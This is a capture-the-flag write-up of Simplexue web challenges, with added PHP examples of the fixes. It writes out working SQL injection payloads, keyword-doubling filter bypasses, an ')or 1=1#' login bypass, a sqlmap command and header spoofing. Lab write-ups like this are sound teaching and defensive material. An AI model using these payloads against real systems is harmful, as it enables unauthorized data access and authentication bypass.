WEB CTF: Simplexue Academy (西普学院)
2015-11-26 11:49
1. Chrysanthemum
http://ctf1.simplexue.com/web/6/
Hint:
Please make sure you have installed .net framework 9.9!
Intercept the request with Burp and change the User-Agent to Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9). All of the injections below are sent with this header set.
id=1 returns: hacker:welcome to simplexue CTF
id=4 returns: hacker: don’t try again
id=0/**/ununionion/**/seselectlect/**/1,user(),database()
User name and database name: root@cuit-092a2b258a inject
id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--
simplexue: flag is SimCTF{xuectf}
2. Forbidden
http://ctf1.simplexue.com/basic/header/
Hint:
You don't have permission to access /on this server.
Make sure you are in HongKong
Intercept the request with Burp and change the header to Accept-Language:zh-hk, which gives => KEY:123JustUserAGent
3. The head is a bit big
http://ctf1.simplexue.com/web/1/index.asp?id=1
Hint:
You don't have permission to access / on this server.
Make sure you are in the region of England and browsing this site with Internet Explorer
Intercept the request with Burp and set these two headers:
User-Agent: Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)
Accept-Language:en-gb
The key is:HTTpH34der
4. Please enter the password
http://ctf1.simplexue.com/basic/js/index.asp
Intercept the response with Burp to get the JavaScript:
<script type="text/javascript">
document.oncontextmenu=function(){return false};
var a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);
function check(){
    if(document.getElementById("txt").value==a){
        return true;
    }else{
        alert("密码错误"); // "Wrong password"
        return false;
    }
}
</script>
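Compute the value with a C program:
#include <stdio.h>

int main(void)
{
    /* float carries less precision than JavaScript's double,
       but only the integer part of the result is needed */
    float a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    printf("%f",a);
    return 0;
}
Result: 424178.562500. Entering 424178 pops up key=> @#$JSisagoodtool@#$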
5. This one looks fairly simple
http://ctf5.simplexue.com/8/index.php?id=1
id=1'
id=1 and 1=1
id=1 and 1=2 => the different responses confirm SQL injection
id=1 order by 2 => two columns
id=1 union select 1,2 => column 2 is echoed back
version(): 5.0.45-community-nt
database(): my_db
user(): phpsql@localhost
Dump the databases:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
information_schema my_db
Dump the tables (0x6d795f6462 is my_db in hex):
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1
news thiskey
Dump the columns:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1
id content k0y
Dump the contents:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
6. Cat catches mouse
http://ctf1.simplexue.com/basic/catch/
Inspecting the HTTP headers shows Content-Row: MTQ0ODU0MzEyNA==. Submitting MTQ0ODU0MzEyNA== gives => KEY: #WWWnsf0cus_NET#
7. The programmer's problem
http://ctf1.simplexue.com/web/4/index.php
View the source code:
<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("*******", "****", "****");
    mysql_select_db("****") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
    }
    $user = $_POST[user];
    $pass = md5($_POST[pass]);
    $sql = "select user from php where (user='$user') and (pw='$pass')";
    $query = mysql_query($sql);
    if (!$query) {
        printf("Error: %s\n", mysql_error($conn));
        exit();
    }
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
    if($row['user']=="admin") {
        echo "<p>Logged in! Key: *********** </p>";
    }
    if($row['user'] != "admin") {
        echo("<p>You are not admin!</p>");
    }
}
?>
Entering admin returns "You are not admin!", which suggests closing the quote and the parenthesis in the query. Entering => ')or 1=1# returns Key: WWW_SIMPLEXUE_COM
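The fix for the query in challenge 7, as an added example that is not part of the original write-up or the challenge's code. It assumes PHP with the pdo_sqlite extension; an in-memory SQLite database and a constructed password stand in for the challenge's MySQL server.

```php
<?php
// Added example. Table and column names come from the challenge source above;
// the SQLite database and the sample row are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table php (user text, pw text)');
$db->prepare('insert into php values (?, ?)')
   ->execute(['admin', md5('constructed-password')]);

// What the challenge code builds: the input becomes part of the SQL text.
function concatenatedSql(string $user, string $pass): string
{
    $pw = md5($pass);
    return "select user from php where (user='$user') and (pw='$pw')";
}

// Hardened lookup: the SQL text is fixed and the input travels as bound values.
// md5 is kept only to mirror the challenge; real code should store hashes made
// with password_hash() and check them with password_verify().
function loginUser(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare('select user from php where (user = :user) and (pw = :pw)');
    $stmt->execute([':user' => $user, ':pw' => md5($pass)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['user'];
}

$input = "')or 1=1#"; // the input used in the write-up

// Shown as text only: the input closes user='...' and the parenthesis itself.
echo concatenatedSql($input, 'x'), "\n";

// Bound as data, the same input is compared as a literal user name.
var_dump(loginUser($db, $input, 'x'));

// The legitimate login path is unaffected by the change.
var_dump(loginUser($db, 'admin', 'constructed-password'));
```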
8. what a fuck! What the hell is this thing?
http://ctf5.simplexue.com/DUTCTF/1.html
The page is a bit dizzying and looks like obfuscated JS, so copy it, wrap it in <script> </script>, and it pops up Ihatejs
9. Looks a bit hard
http://ctf8.simplexue.com/phpaudit/
<?php
function GetIP(){
    if(!empty($_SERVER["HTTP_CLIENT_IP"]))
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    else if(!empty($_SERVER["REMOTE_ADDR"]))
        $cip = $_SERVER["REMOTE_ADDR"];
    else
        $cip = "0.0.0.0";
    return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
    echo "Great! Key is *********";
}
else{
    echo "错误!你的IP不在访问列表之内!"; // "Error! Your IP is not in the access list!"
}
?>
HTTP protocol:
Intercept the request with Burp and add X-Forwarded-For: 1.1.1.1 to spoof the IP as 1.1.1.1 => Key is http_client
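A hardened counterpart to GetIP() from challenge 9, as an added example that is not part of the original write-up or the challenge's code. The function name clientIp, the $trustedProxies list and all sample addresses are assumptions made for illustration.

```php
<?php
// Added example. $trustedProxies is an assumed deployment setting: the
// addresses of the reverse proxies you operate yourself.
function clientIp(array $server, array $trustedProxies = []): string
{
    $peer = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    // Client-IP and X-Forwarded-For are request headers, so any client can set
    // them. Only the TCP peer address is filled in by the server itself.
    if (!in_array($peer, $trustedProxies, true)) {
        return $peer;
    }
    // The peer is our own proxy: walk X-Forwarded-For from the right, because
    // each proxy appends the address it received the connection from.
    $header = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    $hops = array_reverse(array_map('trim', explode(',', $header)));
    foreach ($hops as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break;          // empty or malformed entry: fall back to the peer
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;    // first address that is not one of our proxies
        }
    }
    return $peer;
}

$proxies = ['10.0.0.5'];    // constructed sample value

// Constructed request 1: direct connection carrying the header from the write-up.
$direct = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '1.1.1.1'];

// Constructed request 2: the same forged entry, relayed by the trusted proxy,
// which appended the address it actually saw.
$proxied = ['REMOTE_ADDR' => '10.0.0.5',
            'HTTP_X_FORWARDED_FOR' => '1.1.1.1, 198.51.100.9'];

foreach ([$direct, $proxied] as $request) {
    $ip = clientIp($request, $proxies);
    // The challenge's access check, applied to the address the server can vouch for.
    echo $ip, ' allowed=', var_export($ip === '1.1.1.1', true), "\n";
}
```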
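10. Come in and get what you want
http://ctf1.simplexue.com/web/1/index.asp?id=1
This challenge is about finding the admin back end:
Entering admin and viewing the source shows the hint => "Heh, the idea is right, but it is not here. Think about who has the most power."
Entering system => KEY: "!!!WellDoneBrother!"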
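11. Looks a bit hard
http://ctf1.simplexue.com/basic/inject/
This is a blind injection challenge.
Enter the user name admin with any password, then submit.
Response: login failed, wrong user name and password
Then try this: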
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login
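Note:
ascii(str): returns the ASCII code of the first character of the string; substr(str,start,length)/substring(str,start,length): extracts a substring (str is the string, start the starting position, length the length)
This yields the database name: test
Then replace database() with other expressions to extract the rest of the data.
Note: this challenge filters select; use selselectect instead.
With sqlmap: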
sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass=" -D test --table
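Why the doubled keywords in challenges 1 and 11 get through, and a check that does not have the problem, as an added example that is not part of the original write-up or the challenges' code. The blacklist in stripOnce is an assumed model of the filter, inferred from the doubled keywords above; parseId is a hypothetical helper name.

```php
<?php
// Added example. The keyword list is an assumption: the write-up only shows
// that these words had to be doubled, not the filter's source.
function stripOnce(string $input): string
{
    // One pass per keyword: deleting the inner match glues the outer halves
    // back together, and the result is never checked again.
    return str_ireplace(['union', 'select', 'from', 'pass', 'admin'], '', $input);
}

// Allow-list alternative for a numeric id: accept a non-negative integer and
// reject everything else instead of trying to repair it.
function parseId(string $input): ?int
{
    $id = filter_var($input, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// One benign id and the first input from challenge 1 of the write-up.
$samples = [
    '4',
    '0/**/ununionion/**/seselectlect/**/1,user(),database()',
];

foreach ($samples as $raw) {
    $filtered = stripOnce($raw);   // what a delete-once filter hands to the query
    $id = parseId($raw);           // what the allow-list check hands to the query
    printf("raw:      %s\nfiltered: %s\nparseId:  %s\n\n",
        $raw, $filtered, $id === null ? 'rejected' : (string) $id);
}
```

The validated integer should still be passed to the database as a bound parameter rather than concatenated into the SQL text.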